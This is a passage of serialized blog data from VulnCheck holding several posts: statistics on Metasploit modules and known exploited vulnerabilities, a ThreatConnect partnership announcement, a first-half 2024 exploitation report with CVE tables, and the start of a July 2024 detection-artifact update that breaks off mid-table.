Exploited Vulnerability. This percentage seemed lower than expected, prompting further investigation.",[61,68070,68072],{"id":68071},"exploring-metasploit-modules-mapped-to-known-exploited-vulnerabilities-by-year","Exploring Metasploit Modules Mapped to Known Exploited Vulnerabilities by Year",[18,68074,68075],{},[68,68076],{":width":10862,"alt":68077,"src":68034},"Metasploit KEV by Year",[18,68079,68080],{},"Next, I analyzed the Metasploit data by CVE-Year (not the CVE publish date). The results showed a high percentage of relatively newer vulnerabilities with known exploitation and much lower percentages for older vulnerabilities. From 2020 to 2024 (to date), 56% of Metasploit modules have been associated with known exploitation. Prior to 2020, this ratio drops to 19% across vulnerabilities from 1999 to 2019.\nThis trend aligns with the timing of when we began collecting evidence of known exploitation and when CISA launched the CISA KEV. It suggests that older vulnerabilities may have been exploited, but evidence is less readily available.",[61,68082,68084],{"id":68083},"metasploit-module-availability-related-to-vulncheck-kev","Metasploit Module Availability Related to VulnCheck KEV",[18,68086,68087],{},[68,68088],{":width":10862,"alt":68089,"src":68090},"Metasploit Mapped to KEV by Days","\u002Fblog\u002Fmetasploit-kev\u002Fmetasploit-kev-days.png",[18,68092,68093],{},"Another important consideration is the availability of Metasploit modules in relation to when a vulnerability was added to VulnCheck KEV. The data shows that 66.6% (443 out of 665) of the Metasploit modules with known exploitation evidence were available on or before the date of the indexed exploitation evidence.",[1920,68095,68097],{"id":68096},"using-known-exploitation-and-weaponization-in-an-evidence-based-approach-to-vulnerability-prioritization","Using Known Exploitation and Weaponization in an Evidence-Based Approach to Vulnerability Prioritization",[18,68099,68100],{},[68,68101],{":width":10862,"alt":68102,"src":68103},"Evidence Based Prioritization","\u002Fblog\u002Fvulnerability-prioritization\u002Fevidence-based-prioritization.png",[18,68105,68106],{},"Security practitioners have long struggled to make informed decisions due to limited exploit evidence and threat context. By giving weaponized vulnerabilities such as Metasploit Modules, a seat at the prioritization table, in addition to known exploited vulnerabilities, security practitioners can get to vulnerabilities faster that are likely to be exploited.",[18,68108,68109,68110],{},"Learn more about how VulnCheck can help you take an evidence-based approach to Vulnerability prioritization here: ",[47,68111,54458],{"href":54458,"rel":68112},[51],[61,68114,202],{"id":201},[18,68116,205],{},[18,68118,208],{},[18,68120,211,68121,217],{},[47,68122,216],{"href":214,"rel":68123},[51],{"title":219,"searchDepth":220,"depth":220,"links":68125},[68126,68127,68128,68129],{"id":68058,"depth":220,"text":68059},{"id":68071,"depth":220,"text":68072},{"id":68083,"depth":220,"text":68084},{"id":201,"depth":220,"text":202},"2024-08-27","To help security practitioners prioritize vulnerabilities using exploit evidence, we've outlined why weaponized vulnerabilities should be prioritized by mapping Metasploit modules and VulnCheck Known Exploited Vulnerabilities.",{"slug":68133},"metasploit-kev","\u002Fblog\u002Fmetasploit-kev",{"title":68015,"description":68131},"blog\u002Fmetasploit-kev",[1279],"AwyI8-O_F_Wkehv55Gx_zT1ms9i0IyMRymSMEvgXRsA",{"id":68140,"title":68141,"articles":7,"authors":68142,"body":68144,"date":68270,"description":68271,"extension":234,"image":7,"link":7,"meta":68272,"navigation":237,"path":68274,"seo":68275,"series":7,"stem":68276,"subtype":7,"tags":7,"__hash__":68277},"blog\u002Fblog\u002Fvulncheck-threatconnect-partnership.md","VulnCheck and ThreatConnect - Real-time Threat Visibility and the Most Comprehensive Asset Intelligence",[68143],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":68145,"toc":68268},[68146,68154,68157,68160,68163,68166,68169,68177,68182,68185,68188,68191,68199,68202,68213,68216,68221,68241],[18,68147,68148,68151],{},[295,68149,68150],{},"Speed and Accuracy:",[295,68152,68153],{},"Vulnerability Prioritization with VulnCheck and ThreatConnect to Unify Threat Defense",[18,68155,68156],{},"I’m really excited to be writing this blog to announce that VulnCheck is partnering with ThreatConnect. Why? To deliver a new level vulnerability prioritization to joint customers with VulnCheck exploit and vulnerability data integrated into ThreatConnect’s industry-leading TI Ops Platform.",[18,68158,68159],{},"What’s cool about this partnership? At the very highest level, ThreatConnect has built its TI Ops Platform to ingest data, to correlate insights, and to use intelligence to power threat defense.",[18,68161,68162],{},"In the rapidly evolving threat landscape, vulnerability management is a daunting task. Every month thousands of new vulnerabilities emerge, creating a significant challenge for threat intelligence and vulnerability management analysts.",[18,68164,68165],{},"With VulnCheck’s Community Tier solutions – VulnCheck NVD++ and VulnCheck KEV - integrated for ThreatConnect customers, cyber teams have better, faster and more contextual vulnerability data to prioritize which vulnerabilities to fix first – like an early warning system for software vulnerability weaponization and exploitation.",[18,68167,68168],{},"The new integration between ThreatConnect and VulnCheck promises to address these challenges by offering a unified, intelligent approach to accelerating identification and analysis, and improving the precision of prioritizing vulnerabilities for remediation.",[18,68170,68171,68172,59],{},"If anyone wants to take a look at how this integration works, you can find VulnCheck’s solutions integrated into ThreatConnect’s TI Ops Platform, live in the ",[47,68173,68176],{"href":68174,"rel":68175},"https:\u002F\u002Fthreatconnect.com\u002Fmarketplace\u002F",[51],"ThreatConnect Marketplace",[18,68178,68179],{},[295,68180,68181],{},"The Growing Challenge of Vulnerability Management, the Importance of Prioritization, and the Role of Threat Intel",[18,68183,68184],{},"With an average of 25,000 new vulnerabilities each month, analysts must sift through vast amounts of data to identify which vulnerabilities pose the most significant threats to their organizations. It’s a time-consuming process and often leads to wasted resources, gaps between vulnerability disclosure and remediation, and analyst burnout.",[18,68186,68187],{},"Threat intelligence is essential for vulnerability management. Some vulns pose immediate threats, while others may never be exploited or weaponized. Teams and tools can only manage vulnerabilities well when they have a way to prioritize them consistently. Analysts need tools that help them get the necessary insights to quickly determine which vulnerabilities are the most critical to address. This is where VulnCheck enhances this capability for ThreatConnect customers.",[18,68189,68190],{},"By understanding the tactics, techniques, and procedures (TTPs) of threat actors, analysts can better assess the risk associated with specific vulnerabilities. This intelligence helps prioritize remediation efforts and allocate resources more effectively.",[18,68192,68193,68196,68198],{},[295,68194,68195],{},"Introducing a New Integration between ThreatConnect and VulnCheck",[1823,68197],{},"\nThreatConnect is a leading threat intelligence platform that offers comprehensive tools for managing and analyzing threat data. It provides a centralized hub for cybersecurity teams to collaborate, investigate threats, and automate responses.",[18,68200,68201],{},"VulnCheck offers unparalleled visibility into the vulnerability ecosystem. It provides detailed intelligence on vulnerabilities and exploits, helping organizations stay ahead of threat actors and enables them to proactively reduce their attack surface. What is different about VulnCheck is it draws its prioritization capability from:",[1789,68203,68204,68207,68210],{},[25,68205,68206],{},"Its ability to find evidence of exploitation in the wild – and that is how what matters for actually defending any organization.",[25,68208,68209],{},"VulnCheck’s data is the single largest vulnerability and exploit dataset in the industry – over 325M records maintained on ALL CVE’s. And from sources that no other solution can access on a global scale.",[25,68211,68212],{},"The intelligence is delivered in machine consumable format – meaning that tools can ingest the data with no human interpretation \u002F analysis so that the teams can easily work it into workflows that are already built and relied on in the enterprise.",[18,68214,68215],{},"The integration between ThreatConnect and VulnCheck combines the strengths of both platforms. VulnCheck’s vulnerability and exploit intelligence are seamlessly integrated into the ThreatConnect TI Ops Platform, providing a unified view of the threat landscape. This integration enhances the precision with which analysts can identify and prioritize critical vulnerabilities.",[18,68217,68218],{},[295,68219,68220],{},"Key Benefits of the Integration",[22,68222,68223,68229,68235],{},[25,68224,68225,68228],{},[295,68226,68227],{},"Unified Vulnerability Intelligence"," - One of the most significant benefits of the ThreatConnect and VulnCheck integration is the unified view of vulnerability intelligence. Analysts no longer need to collect and process data from disparate sources manually. Instead, they get out-of-the-box insights that streamline their workflows and improve accuracy.",[25,68230,68231,68234],{},[295,68232,68233],{},"Novel Insights and Detailed Analysis"," - The integration offers in-depth details on vulnerabilities and threat actor activities. Analysts gain novel insights into emerging threats and exploits, enabling them to make more informed decisions and prioritize remediation efforts more effectively.",[25,68236,68237,68240],{},[295,68238,68239],{},"Automated Monitoring and Early Warning Indicators"," - Automation is a game-changer in vulnerability management. The integration automates the monitoring of emerging threats and exploits, providing early warning indicators that help analysts stay ahead of potential attacks. This proactive approach reduces the time between vulnerability disclosure and remediation.",[18,68242,68243,68246,68248,68249,14193,68253,68258,68259,68263,68264,59],{},[295,68244,68245],{},"Learn more today!!",[1823,68247],{},"\nTo learn more about the VulnCheck integration with ThreatConnect TI Ops, please visit the ",[47,68250,68176],{"href":68251,"rel":68252},"https:\u002F\u002Fthreatconnect.com\u002Fmarketplace\u002Fvulncheck",[51],[47,68254,68257],{"href":68255,"rel":68256},"https:\u002F\u002Fthreatconnect.com\u002Frequest-a-demo\u002F",[51],"Contact ThreatConnect to speak to an expert today"," to get a personalized demo of the TI Ops Platform and to see the integration in action. To learn more about ",[47,68260,2709],{"href":68261,"rel":68262},"https:\u002F\u002Fvulncheck.com\u002F",[51]," and get a demo, ",[47,68265,68267],{"href":68266},"mailto:sales@vulncheck.com","reach out to speak with one of their vulnerability experts today",{"title":219,"searchDepth":220,"depth":220,"links":68269},[],"2024-08-06","VulnCheck is partnering with ThreatConnect to deliver a new level of vulnerability prioritization to joint customers with VulnCheck exploit and vulnerability data integrated into ThreatConnect’s industry-leading TI Ops Platform.",{"slug":68273},"vulncheck-threatconnect-partnership","\u002Fblog\u002Fvulncheck-threatconnect-partnership",{"title":68141,"description":68271},"blog\u002Fvulncheck-threatconnect-partnership","pmrfZpvIpmTgkm_swLH-uST3SAr39kKGvEgafllfLHo",{"id":68279,"title":68280,"articles":68281,"authors":68302,"body":68304,"date":68828,"description":68829,"extension":234,"image":7,"link":7,"meta":68830,"navigation":237,"path":68832,"seo":68833,"series":7,"stem":68834,"subtype":7,"tags":68835,"__hash__":68836},"blog\u002Fblog\u002Fstate-of-exploitation-1h-2024.md","State of Exploitation - A Peek into 1H-2024 Vulnerability Exploitation",[68282,68285,68289,68293,68298],{"title":68283,"source":39566,"link":68284,"date":68270},"Daily Briefing for 08.06.24","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F13\u002F149",{"title":68286,"source":61436,"link":68287,"date":68288},"Risky Biz News: Ransomware attack hits Olympic venues","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-ransomware-attack-hits-olympic-venues\u002F","2024-08-07",{"title":68290,"source":3508,"link":68291,"date":68292},"Resilient Cyber Newsletter #9","https:\u002F\u002Fwww.resilientcyber.io\u002Fp\u002Fresilient-cyber-newsletter-9?utm_source=substack&publication_id=1138747&post_id=147516014&utm_medium=email&utm_content=share&utm_campaign=email-share&triggerShare=true&isFreemail=true&r=3eto0v&triedRedirect=true","2024-08-13",{"title":68294,"source":68295,"link":68296,"date":68297},"[tl;dr sec] #244 - Cloud Security Slides, Threat Modeling, Security Program Templates","tl;dr sec","https:\u002F\u002Ftldrsec.com\u002Fp\u002Ftldr-sec-244","2024-08-22",{"title":68299,"source":40906,"link":68300,"date":68301},"Scary Security Stats: Roundup from 2024 Research","https:\u002F\u002Fvmblog.com\u002Farchive\u002F2024\u002F10\u002F31\u002Fscary-security-stats-roundup-from-2024-research.aspx","2024-10-31",[68303],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":68305,"toc":68808},[68306,68311,68314,68320,68324,68328,68337,68339,68343,68357,68361,68375,68379,68389,68393,68396,68400,68403,68406,68549,68552,68556,68562,68567,68570,68574,68577,68716,68720,68725,68728,68732,68735,68746,68750,68753,68757,68762,68765,68769,68771,68774,68779,68786,68788,68791,68794,68797,68799,68801,68803],[18,68307,68308],{},[68,68309],{":width":10862,"alt":58618,"src":68310},"\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Fvulncheck-kev-1h-2024.png",[18,68312,68313],{},"In this series, we explore vulnerability disclosure and exploitation, drawing insights from VulnCheck’s Exploit and Vulnerability Intelligence services. VulnCheck leverages automated and scalable processes to collect and analyze data from various sources, providing a comprehensive overview of the threat landscape.\nOur goal in this article is to provide valuable perspectives for the security community focused on what we can observe from trends in vulnerability disclosure, exploitation, weaponization, and exploit availability during the first half of 2024 (Jan-June).",[18,68315,68316,68317,59],{},"Previously we provided insights on the last decade of vulnerability exploitation ",[47,68318,305],{"href":44893,"rel":68319},[51],[1920,68321,68323],{"id":68322},"a-look-into-1h-2024-vulnerability-exploitation","A look into 1H-2024 Vulnerability Exploitation",[61,68325,68327],{"id":68326},"overview","Overview",[18,68329,68330,68331,68336],{},"In the first half of 2024, we observed consistent public disclosure of exploitation in the wild from product companies, security firms, researchers, government agencies, and the broader security community. These disclosures provide defenders with crucial visibility into threats to their environments, allowing for timely action. It’s common for security teams to use this knowledge for vulnerability prioritization and security product teams to use this shared knowledge to prioritize building detection capabilities among many other purposes. We strongly advocate for the public disclosure of exploitation, as it highlights real threats posed to organizations that can be addressed. It is clear that the exploitation of vulnerabilities remains a persistent threat to organizations as the 2024 ",[47,68332,68335],{"href":68333,"rel":68334},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fresources\u002Freports\u002F2024-dbir-data-breach-investigations-report.pdf",[51],"Verizon DBIR"," highlighted earlier this year.",[61,68338,43093],{"id":43092},[993,68340,68342],{"id":68341},"known-exploited-vulnerability-trends","Known Exploited Vulnerability Trends",[22,68344,68345,68348,68351,68354],{},[25,68346,68347],{},"VulnCheck added 390 vulnerabilities to VulnCheck Known Exploited Vulnerabilities (KEV) Catalog that we identified for the first time as being exploited in the wild in 2024, compared with 73 exploited vulnerabilities captured by CISA KEV.",[25,68349,68350],{},"The Known Exploited Vulnerabilities span across 235 software suppliers across 310 products and services.",[25,68352,68353],{},"The top five Product Categories with known exploited vulnerabilities include: Network Edge Devices, Content Management Systems (CMS), Open Source Software, Server Software, and Operating Systems",[25,68355,68356],{},"68 different sources provided the earliest reported exploitation of one or more vulnerabilities in the wild in the first half of 2024.",[993,68358,68360],{"id":68359},"zero-day-botnet-and-exploit-trends","Zero-day, Botnet and Exploit Trends",[22,68362,68363,68369,68372],{},[25,68364,68365,68366,68368],{},"In the first half of 2024, we captured evidence of 53 zero-day vulnerabilities, with exploitation evidence available at or before the public disclosure of the vulnerabilities. This represents 13.6% ",[1373,68367,353],{}," of the Known Exploited Vulnerabilities (KEVs) added to the VulnCheck KEV catalog during this period.",[25,68370,68371],{},"During the first half of 2024, we observed 92 vulnerabilities being weaponized for the first time, with 50 confirmed as exploited in the wild. Of these 50 vulnerabilities, 58% (29\u002F50) were weaponized before their exploitation was disclosed.",[25,68373,68374],{},"70% of vulnerabilities had one or more POC available prior to exploitation disclosure.",[61,68376,68378],{"id":68377},"known-exploited-vulnerabilities","Known Exploited Vulnerabilities",[18,68380,68381,68382,68386,68387],{},"During the 1H-2024, VulnCheck added 390 vulnerabilities to ",[47,68383,68385],{"href":2871,"rel":68384},[51],"VulnCheck Known Exploited Vulnerabilities (KEV) Catalog"," that were identified for the first time as being exploited in the wild in 2024 compared with 73 exploited vulnerabilities captured by CISA KEV. ",[1373,68388,467],{},[18,68390,68391],{},[68,68392],{":width":10862,"alt":58618,"src":68310},[18,68394,68395],{},"The 390 KEVs added to VulnCheck, covered 235 software suppliers across 310 products and services. Software suppliers topping the list include Microsoft, Apple, Ivanti, Google, Oracle, D-Link, Apache, Adobe and Hiltron Systems. Products topping the list include Microsoft Windows, Apple OS\u002FIOS\u002FSafari, Netlify OpenMetadata, Citrix Netscaler, Linux Kernel, Hiltron DVR, Ivanti Connect Secure and Google Chrome.",[993,68397,68399],{"id":68398},"product-categories-for-known-exploited-vulnerabilities","Product Categories for Known Exploited Vulnerabilities",[18,68401,68402],{},"For the first time, we categorized the 1H-2024 KEVs to better understand which product categories are most impacted by known exploited vulnerabilities. This categorization helps security practitioners identify the product categories most commonly associated with new known exploitation. This information is particularly useful in thinking about how an organization might consider reducing their attack surface and automating vulnerability management and patch management processes across their technology stack. We plan to explore several of these categories further the future.",[18,68404,68405],{},"For this report, we categorized the 1H-2024 Known Exploited Vulnerabilities into 18 product categories:",[307,68407,68408,68418],{},[310,68409,68410],{},[313,68411,68412,68415],{},[316,68413,68414],{},"Category",[316,68416,68417],{},"# of Exploited Vulnerabilities",[336,68419,68420,68428,68435,68443,68451,68458,68465,68472,68479,68486,68493,68500,68507,68514,68521,68528,68535,68542],{},[313,68421,68422,68425],{},[341,68423,68424],{},"Network Edge Device",[341,68426,68427],{},"70",[313,68429,68430,68433],{},[341,68431,68432],{},"CMS",[341,68434,68427],{},[313,68436,68437,68440],{},[341,68438,68439],{},"Open Source Software",[341,68441,68442],{},"56",[313,68444,68445,68448],{},[341,68446,68447],{},"Server Software",[341,68449,68450],{},"35",[313,68452,68453,68456],{},[341,68454,68455],{},"Operating System",[341,68457,48690],{},[313,68459,68460,68463],{},[341,68461,68462],{},"Hardware",[341,68464,37148],{},[313,68466,68467,68470],{},[341,68468,68469],{},"File Sharing",[341,68471,850],{},[313,68473,68474,68477],{},[341,68475,68476],{},"Developer Tools",[341,68478,39259],{},[313,68480,68481,68484],{},[341,68482,68483],{},"Browser",[341,68485,39254],{},[313,68487,68488,68491],{},[341,68489,68490],{},"ICS\u002FOT",[341,68492,28534],{},[313,68494,68495,68498],{},[341,68496,68497],{},"Desktop Application",[341,68499,377],{},[313,68501,68502,68505],{},[341,68503,68504],{},"Device Management",[341,68506,723],{},[313,68508,68509,68512],{},[341,68510,68511],{},"Email",[341,68513,356],{},[313,68515,68516,68519],{},[341,68517,68518],{},"Virtualization",[341,68520,380],{},[313,68522,68523,68526],{},[341,68524,68525],{},"Backup",[341,68527,380],{},[313,68529,68530,68533],{},[341,68531,68532],{},"AI",[341,68534,491],{},[313,68536,68537,68540],{},[341,68538,68539],{},"Security Tools",[341,68541,353],{},[313,68543,68544,68547],{},[341,68545,68546],{},"Identity",[341,68548,353],{},[18,68550,68551],{},"The main objective of categorizing these vulnerabilities is to provide greater visibility into new exploitation evidence, helping to ensure that security practitioners monitor the most at-risk product categories for new exploited vulnerabilities. Note that some products could be associated with multiple categories; however, for this visualization, we focused on using a single primary category for each product.",[993,68553,68555],{"id":68554},"first-source-to-disclose-known-exploitation","First Source to Disclose Known Exploitation",[18,68557,68558],{},[68,68559],{":width":10862,"alt":68560,"src":68561},"First Source Exploitation","\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Ffirst-source-known-exploitation.png",[18,68563,68564,68565],{},"For the 390 vulnerabilities first identified in the first half of 2024, VulnCheck collected 10,611 references of exploitation in the wild. From hundreds of reputable sources, we identified 68 different sources that were the earliest reporters of exploitation during this period. The chart above demonstrates the number of unique exploited vulnerabilities reported first by a source. ",[1373,68566,353],{},[18,68568,68569],{},"Evidence of vulnerability exploitation is broadly distributed across many sources, which is one reason we focus on automated and scalable processes at VulnCheck.\nCoordinated disclosure or copy\u002Fpaste practices often create discrepancies in who reported exploitation first. Particularly in the cases of CISA, Microsoft, Google, Google Project Zero, and Apple who consistently disclose exploitation evidence at roughly the same time, contributing to these discrepancies.This is a good thing as it demonstrates the proliferation of exploitation evidence.",[993,68571,68573],{"id":68572},"top-vulnerabilities-by-the-number-of-sources-reporting-known-exploitation","Top Vulnerabilities by the number of sources reporting known exploitation",[18,68575,68576],{},"The number of unique references reporting known exploitation is often a good indicator for widely exploited vulnerabilities. The top 10 vulnerabilities by the number of unique sources referencing exploitation in the first half of 2024 include:",[307,68578,68579,68592],{},[310,68580,68581],{},[313,68582,68583,68585,68587,68589],{},[316,68584,32524],{},[316,68586,3581],{},[316,68588,3584],{},[316,68590,68591],{},"# of References",[336,68593,68594,68607,68619,68632,68645,68657,68668,68680,68692,68704],{},[313,68595,68596,68599,68602,68605],{},[341,68597,68598],{},"CVE-2024-21887",[341,68600,68601],{},"Ivanti",[341,68603,68604],{},"Connect Secure and Policy Secure",[341,68606,65524],{},[313,68608,68609,68612,68614,68616],{},[341,68610,68611],{},"CVE-2023-46805",[341,68613,68601],{},[341,68615,68604],{},[341,68617,68618],{},"47",[313,68620,68621,68624,68627,68630],{},[341,68622,68623],{},"CVE-2024-1709",[341,68625,68626],{},"ConnectWise",[341,68628,68629],{},"ScreenConnect",[341,68631,48690],{},[313,68633,68634,68636,68639,68642],{},[341,68635,43392],{},[341,68637,68638],{},"Palo Alto Networks",[341,68640,68641],{},"PAN-OS",[341,68643,68644],{},"22",[313,68646,68647,68650,68652,68655],{},[341,68648,68649],{},"CVE-2024-21893",[341,68651,68601],{},[341,68653,68654],{},"Connect Secure, Policy Secure, and Neurons",[341,68656,36929],{},[313,68658,68659,68662,68664,68666],{},[341,68660,68661],{},"CVE-2024-1708",[341,68663,68626],{},[341,68665,68629],{},[341,68667,850],{},[313,68669,68670,68673,68675,68678],{},[341,68671,68672],{},"CVE-2024-27198",[341,68674,54070],{},[341,68676,68677],{},"TeamCity",[341,68679,2837],{},[313,68681,68682,68684,68687,68690],{},[341,68683,22217],{},[341,68685,68686],{},"Atlassian",[341,68688,68689],{},"Confluence Server and Data Center",[341,68691,2837],{},[313,68693,68694,68697,68699,68702],{},[341,68695,68696],{},"CVE-2024-21412",[341,68698,3129],{},[341,68700,68701],{},"Windows",[341,68703,37766],{},[313,68705,68706,68708,68711,68714],{},[341,68707,1510],{},[341,68709,68710],{},"PHP Group",[341,68712,68713],{},"PHP",[341,68715,37766],{},[61,68717,68719],{"id":68718},"exploring-cisa-kev","Exploring CISA KEV",[18,68721,68722],{},[68,68723],{":width":10862,"alt":68560,"src":68724},"\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Fcisa-kev-1h-2024.png",[18,68726,68727],{},"During the first half of 2024, CISA added 73 vulnerabilities to the CISA KEV catalog, covering 33 software suppliers. Of these, 53 vulnerabilities had exploitation evidence captured in the VulnCheck KEV catalog before they were added to CISA KEV. Many of these were also disclosed by the vendor on the same day. Additionally, 16 of the 53 vulnerabilities had exploitation evidence dating back to before 2024.\nAs shown in the visual above, CISA KEV has primarily focused on widely adopted technologies, including internet-facing technologies, operating systems, and client-side software.",[61,68729,68731],{"id":68730},"zero-days","Zero Days",[18,68733,68734],{},"The term \"zero-day\" is often used in various ways across the security industry. For this research, we define a zero-day simply as a vulnerability for which evidence of exploitation in the wild is published on or before the vulnerability itself is publicly disclosed.",[18,68736,68365,68737,68739,68740,68745],{},[1373,68738,491],{}," of the Known Exploited Vulnerabilities (KEVs) added to the VulnCheck KEV catalog. In comparison, 130 zero-days were identified in 2023 which could mean we might see less in total during 2024. This could be due to multiple factors such as improvements in vulnerability disclosure timelines. Defenders should expect a relatively consistent number of zero-days, many of which are high-impact vulnerabilities affecting internet-facing network devices, web services, operating systems, and browsers.\nGoogle's ",[47,68741,68744],{"href":68742,"rel":68743},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002F2023-zero-day-trends",[51],"Zero Day Trends Report"," observed 97 zero-day vulnerabilities exploited in the wild, providing a comparative data point.",[993,68747,68749],{"id":68748},"comparing-zero-days-with-cisa-kev","Comparing Zero-days with CISA KEV",[18,68751,68752],{},"Notably, 33 of the 53 zero-days VulnCheck captured in the first half of 2024 were also added to the CISA KEV catalog, representing 45% of CISA KEV additions for 2024. These zero-days often involve major government suppliers such as Microsoft, Google, Apple, Citrix, Fortinet, Palo Alto Networks, Cisco, and CheckPoint, which typically disclose exploitation at the time of patch release and CVE issuance. It would be great to see more technology vendors disclosing when they have knowledge of exploitation.",[61,68754,68756],{"id":68755},"ransomware-botnets-oh-my","Ransomware & Botnets, Oh my",[18,68758,68759],{},[68,68760],{":width":10862,"alt":68560,"src":68761},"\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Fransomware-botnet-1h2024.png",[18,68763,68764],{},"Botnets and ransomware pose a significant risk to organizations due to their use of automated attack techniques that opportunistically target victims. During the first half of 2024, VulnCheck captured evidence of vulnerabilities being associated with ransomware and botnets for the first time. This included 30 vulnerabilities linked to ransomware and 46 vulnerabilities linked to botnets.",[61,68766,68768],{"id":68767},"weaponization-proof-of-concept-availability-associated-w-kevs","Weaponization & Proof-of-Concept Availability Associated w\u002F KEVs",[18,68770,68371],{},[18,68772,68773],{},"Regarding Proof-of-Concept (PoC) availability, 304 of the 390 Known Exploited Vulnerabilities (KEVs) had one or more PoCs available when this report was compiled. Among these, 273 (70%) had PoCs available prior to the disclosure of exploitation. It’s also worth considering the 53 zero-days, where POC or weaponization of a vulnerability is rare prior to disclosure. This underscores Weaponization and PoC availability as a reliable indicator that a vulnerability is more likely to be exploited in the wild.",[18,68775,68776],{},[68,68777],{":width":10862,"alt":68560,"src":68778},"\u002Fblog\u002Fstate-of-exploitation-1h-2024\u002Fpoc-availability-1h2024.png",[18,68780,68781,68782,59],{},"Evidence of weaponization and POC vulnerabilities is useful when building out evidence-based prioritization using a framework such as Stakeholder-Specific Vulnerability Categorization.\nWe initially explored weaponization and PoC availability in our recent ",[47,68783,68785],{"href":44893,"rel":68784},[51],"state of exploitation article",[61,68787,19715],{"id":19714},[18,68789,68790],{},"[1] We continue to expand historical exploitation evidence for hundreds of CVEs from previous years in addition to the new evidence collected. From the time we cut off the data for this report which was July 22, 2024 to the time of publish, we added over 100 new KEVs from multiple sources. Our priority remains in provideing broad and timely access to exploit intelligence.",[18,68792,68793],{},"[2] There is a bias towards Shadow Server during the 1h-2024 as we onboarded the source in November which has trailed into January and February of this year. We expect Shadow Server to continue to be one of the leading sources to be the first to report known exploitation but it’s likely their representation will be smaller during future periods.",[18,68795,68796],{},"[3] Analyzing past years' data, we observed that zero-days comprised 25% of all Known Exploited Vulnerabilities as we noted in our previous report which looked at 2014 to 2023. The lower percentage observed in the first half of 2024 is likely due to the short-term impact of onboarding ShadowServer as a new source of exploitation evidence.",[61,68798,202],{"id":201},[18,68800,205],{},[18,68802,208],{},[18,68804,211,68805,217],{},[47,68806,216],{"href":214,"rel":68807},[51],{"title":219,"searchDepth":220,"depth":220,"links":68809},[68810,68811,68815,68820,68821,68824,68825,68826,68827],{"id":68326,"depth":220,"text":68327},{"id":43092,"depth":220,"text":43093,"children":68812},[68813,68814],{"id":68341,"depth":1266,"text":68342},{"id":68359,"depth":1266,"text":68360},{"id":68377,"depth":220,"text":68378,"children":68816},[68817,68818,68819],{"id":68398,"depth":1266,"text":68399},{"id":68554,"depth":1266,"text":68555},{"id":68572,"depth":1266,"text":68573},{"id":68718,"depth":220,"text":68719},{"id":68730,"depth":220,"text":68731,"children":68822},[68823],{"id":68748,"depth":1266,"text":68749},{"id":68755,"depth":220,"text":68756},{"id":68767,"depth":220,"text":68768},{"id":19714,"depth":220,"text":19715},{"id":201,"depth":220,"text":202},"2024-08-05","A Look into the Last 6-months of Vulnerability Exploitation… January-June 2024",{"slug":68831},"state-of-exploitation-1h-2024","\u002Fblog\u002Fstate-of-exploitation-1h-2024",{"title":68280,"description":68829},"blog\u002Fstate-of-exploitation-1h-2024",[1280],"ZS4DxPP3TUtwVp5xD6z7yn_v2fPs-ntgwIl9yb6qODI",{"id":68838,"title":68839,"articles":7,"authors":68840,"body":68842,"date":69238,"description":69239,"extension":234,"image":7,"link":7,"meta":69240,"navigation":237,"path":69242,"seo":69243,"series":7,"stem":69244,"subtype":7,"tags":69245,"__hash__":69246},"blog\u002Fblog\u002Finitial-access-intelligence-july-2024.md","VulnCheck Initial Access Intelligence Update - July 2024",[68841],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":68843,"toc":69234},[68844,68847,68853,68856,68861,68864,68880,68884,69227,69229],[18,68845,68846],{},"VulnCheck Initial Access Intelligence equips organizations and security teams with detection artifacts such as Suricata signatures, YARA rules, PCAPs, and private exploit PoCs to defend against initial access vulnerabilities that are either already being exploited or likely to be exploited soon.",[18,68848,68849,68850,59],{},"Before we get into this months details, it's worth mentioned that go-exploit, VulnCheck's exploit framework, now supports scanless asset detection and version scanning, using the exact same code for active scanning. You can learn more about that ",[47,68851,305],{"href":68852},"\u002Fblog\u002Fvulncheck-goes-scanless",[18,68854,68855],{},"In July 2024, VulnCheck crossed 250+ Initial Access Intelligence (IAI) artifacts, developing artifacts for 14 CVEs, covering 13 different vendors and 10 different products.",[18,68857,68858],{},[68,68859],{":width":10862,"alt":67495,"src":68860},"\u002Fblog\u002Finitial-access-intelligence-july-2024\u002Fvulncheck-initial-access-july.png",[18,68862,68863],{},"To provide better visibility into these updates, we’ve broken down July’s Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,68865,68866,68868,68870,68872,68874,68876,68878],{},[25,68867,325],{},[25,68869,59440],{},[25,68871,59443],{},[25,68873,59446],{},[25,68875,59449],{},[25,68877,59452],{},[25,68879,64745],{},[61,68881,68883],{"id":68882},"july-2024-initial-access-artifacts","July 2024 Initial Access Artifacts",[307,68885,68886,68908],{},[310,68887,68888],{},[313,68889,68890,68892,68894,68896,68898,68900,68902,68904,68906],{},[316,68891,59471],{},[316,68893,59474],{},[316,68895,319],{},[316,68897,59479],{},[316,68899,59482],{},[316,68901,59485],{},[316,68903,59488],{},[316,68905,61654],{},[316,68907,61657],{},[336,68909,68910,68933,68956,68977,69000,69022,69043,69066,69089,69112,69135,69158,69181,69204],{},[313,68911,68912,68915,68918,68921,68923,68925,68927,68929,68931],{},[341,68913,68914],{},"Zyxel Customer-Provided Equipment Configuration Disclosure",[341,68916,68917],{},"2024-07-04",[341,68919,68920],{},"CVE-2023-28770",[341,68922,59510],{},[341,68924,59510],{},[341,68926,59510],{},[341,68928,59510],{},[341,68930,59510],{},[341,68932],{},[313,68934,68935,68938,68941,68944,68946,68948,68950,68952,68954],{},[341,68936,68937],{},"Apache Superset Session Forgery",[341,68939,68940],{},"2024-07-05",[341,68942,68943],{},"CVE-2023-27524",[341,68945,59510],{},[341,68947,59510],{},[341,68949,59510],{},[341,68951,59510],{},[341,68953,59510],{},[341,68955,59510],{},[313,68957,68958,68961,68963,68965,68967,68969,68971,68973,68975],{},[341,68959,68960],{},"GeoServer Remote Code 